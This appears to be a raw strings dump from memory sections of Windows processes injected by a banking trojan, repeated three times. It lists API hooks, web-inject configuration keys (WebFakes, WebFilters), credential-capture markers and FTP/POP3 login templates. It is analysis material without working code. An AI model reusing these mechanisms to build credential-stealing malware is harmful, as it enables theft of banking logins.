gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password:
svchost.exe_1180_rwx_20590000_00037000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
tcPR
tcPR
h.exe
h.exe
user32.dll
user32.dll
kernel32.dll
kernel32.dll
|GetWindowsDirectoryA
|GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ws2_32.dll
ws2_32.dll
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
advapi32.dll
advapi32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
keyworddestination
keyworddestination
USER PASS
USER PASS
PORT
PORT
RapportGP.dll
RapportGP.dll
csshiftjis
csshiftjis
cswindows31j
cswindows31j
iso_646.irv:1991
iso_646.irv:1991
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
HTTP/1.1
HTTP/1.1
\\.\pipe\
\\.\pipe\
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
PTF://%s:%s@%s:%d/
PTF://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
dnsapi.dll
dnsapi.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
InternetOpenUrlA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenUrlW
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
QZ .QZ hSZ B^Z ']Z
QZ .QZ hSZ B^Z ']Z
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
wurlmon.dll
wurlmon.dll
UrlMkGetSessionOption
UrlMkGetSessionOption
nss3.dll
nss3.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
nspr4.dll
nspr4.dll
hXXps://hXXp://TE
hXXps://hXXp://TE
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21781-C39D-B603-C11E-00485360D01E}
%Documents and Settings%\LocalService\Local Settings\Application Data\iwmikkry.log
%Documents and Settings%\LocalService\Local Settings\Application Data\iwmikkry.log
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password:
spoolsv.exe_1424_rwx_20590000_00037000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
tcPR
tcPR
h.exe
h.exe
user32.dll
user32.dll
kernel32.dll
kernel32.dll
|GetWindowsDirectoryA
|GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ws2_32.dll
ws2_32.dll
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
advapi32.dll
advapi32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
keyworddestination
keyworddestination
USER PASS
USER PASS
PORT
PORT
RapportGP.dll
RapportGP.dll
csshiftjis
csshiftjis
cswindows31j
cswindows31j
iso_646.irv:1991
iso_646.irv:1991
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
HTTP/1.1
HTTP/1.1
\\.\pipe\
\\.\pipe\
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
PTF://%s:%s@%s:%d/
PTF://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
dnsapi.dll
dnsapi.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
InternetOpenUrlA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenUrlW
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
QZ .QZ hSZ B^Z ']Z
QZ .QZ hSZ B^Z ']Z
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
urlmon.dll
urlmon.dll
UrlMkGetSessionOption
UrlMkGetSessionOption
nss3.dll
nss3.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
nspr4.dll
nspr4.dll
hXXps://hXXp://TE
hXXps://hXXp://TE
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21781-C39D-B603-C11E-00485360D01E}
%Documents and Settings%\LocalService\Local Settings\Application Data\iwmikkry.log
%Documents and Settings%\LocalService\Local Settings\Application Data\iwmikkry.log
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password:
jqs.exe_1640_rwx_20590000_00037000:
Gh.logWj
Gh.logWj
h.logPj
h.logPj
tcPR
tcPR
h.exe
h.exe
user32.dll
user32.dll
kernel32.dll
kernel32.dll
|GetWindowsDirectoryA
|GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
ws2_32.dll
ws2_32.dll
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
advapi32.dll
advapi32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
keyworddestination
keyworddestination
USER PASS
USER PASS
PORT
PORT
RapportGP.dll
RapportGP.dll
csshiftjis
csshiftjis
cswindows31j
cswindows31j
iso_646.irv:1991
iso_646.irv:1991
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
windows-874
windows-874
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
hostuser-agentoptionsgetheadpostputdeletetraceacceptaccept-charsetaccept-encodingaccept-languageauthorizationexpectfromhostif-modified-sinceif-matchif-none-matchif-rangeif-unmodifiedsincemax-forwardsproxy-authorizationrangerefererteuser-agent100101200201202203204205206300301302303304305306307400401402403404405406407408409410411412413414415416417500501502503504505accept-rangesageetaglocationproxy-authenticatepublicretry-afterservervarywarningwww-authenticateallowcontent-basecontent-encodingcache-controlconnectiondatetrailertransfer-encodingupgradeviawarningcontent-languagecontent-lengthcontent-locationcontent-md5content-rangecontent-typeetagexpireslast-modifiedset-cookieMondayTuesdayWednesdayThursdayFridaySaturdaySundayJanFebMarAprMayJunJulAugSepOctNovDecchunkedtext/htmlimage/pngimage/jpgimage/gifapplication/xmlapplication/xhtmltext/plainpublicmax-agecharset=iso-8859-1utf-8gzipdeflateHTTP/1.1statusversionurl
HTTP/1.1
HTTP/1.1
\\.\pipe\
\\.\pipe\
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
PTF://%s:%s@%s:%d/
PTF://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
pop3://%s:%s@%s:%d/
dnsapi.dll
dnsapi.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
InternetOpenUrlA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenUrlW
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
QZ .QZ hSZ B^Z ']Z
QZ .QZ hSZ B^Z ']Z
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
urlmon.dll
urlmon.dll
UrlMkGetSessionOption
UrlMkGetSessionOption
nss3.dll
nss3.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
nspr4.dll
nspr4.dll
hXXps://hXXp://TE
hXXps://hXXp://TE
{49A21781-C39D-B603-C11E-00485360D01E}
{49A21781-C39D-B603-C11E-00485360D01E}
%Documents and Settings%\LocalService\Local Settings\Application Data\iwmikkry.log
%Documents and Settings%\LocalService\Local Settings\Application Data\iwmikkry.log
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21783-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
{49A21782-C39D-B603-C11E-00485360D01E}
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
ConnectNamedPipe
ConnectNamedPipe
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
ExitWindowsEx
ExitWindowsEx
GetKeyboardState
GetKeyboardState
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
|75001234
|75001234
PR_xTCPSh
PR_xTCPSh
wsock32.dll
wsock32.dll
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
keywords
keywords
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
alluniqcontrolexplicitASCIIUTF8UNICODE{keyword}
set_url
set_url
WebFilters
WebFilters
WebDataFilters
WebDataFilters
WebFakes
WebFakes
|0123456789
|0123456789
gzipdeflateContent-Type: application/x-www-form-urlencoded
gzipdeflateContent-Type: application/x-www-form-urlencoded
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Tdomain=google.ru&cookies=enabled&reason=1&auth=false
Cookie: User-Agent-Session: Basic login: Basic password:
Cookie: User-Agent-Session: Basic login: Basic password: